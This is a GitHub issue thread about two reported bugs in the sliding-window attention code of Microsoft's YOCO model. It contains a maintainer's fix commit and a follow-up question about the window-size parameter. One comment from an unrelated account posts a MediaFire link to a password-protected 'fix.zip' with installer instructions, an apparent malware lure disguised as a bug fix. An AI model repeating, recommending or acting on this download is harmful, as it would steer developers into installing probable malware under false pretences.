### ISSUE TITLE
Maybe some bugs of YOCO

### ISSUE THREAD

**Issue by x54-729** [microsoft/unilm#1612]
1. In `SlidingWindowAttention`, `self.window_size` is `sliding_size - 1` when init:
https://github.com/microsoft/unilm/blob/378d4280ebf68a2e10d74c9e8081823934b65249/YOCO/yoco/models/decoder/sliding_window_attention.py#L21
But in forward it is still minus 1 when calling flash_attn_func
https://github.com/microsoft/unilm/blob/378d4280ebf68a2e10d74c9e8081823934b65249/YOCO/yoco/models/decoder/sliding_window_attention.py#L64
2. Also in `SlidingWindowAttention`, the using of key value seems not right
https://github.com/microsoft/unilm/blob/378d4280ebf68a2e10d74c9e8081823934b65249/YOCO/yoco/models/decoder/sliding_window_attention.py#L50-L64
When calling flash_attn_func, the k v is not concat

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by donglixp** [comment]
https://github.com/microsoft/unilm/commit/53ed1159c596f33af5b228f6041f6d7ffee963c0

**Comment by donglixp** [comment]
fixed

**Comment by x54-729** [comment]
https://github.com/microsoft/unilm/blob/53ed1159c596f33af5b228f6041f6d7ffee963c0/YOCO/yoco/models/decoder/sliding_window_attention.py#L52-L53

After fix, which one is correct here as parameter, `self.window_size` or `self.window_size - 1`?

**Comment by x54-729** [comment]
Thanks!
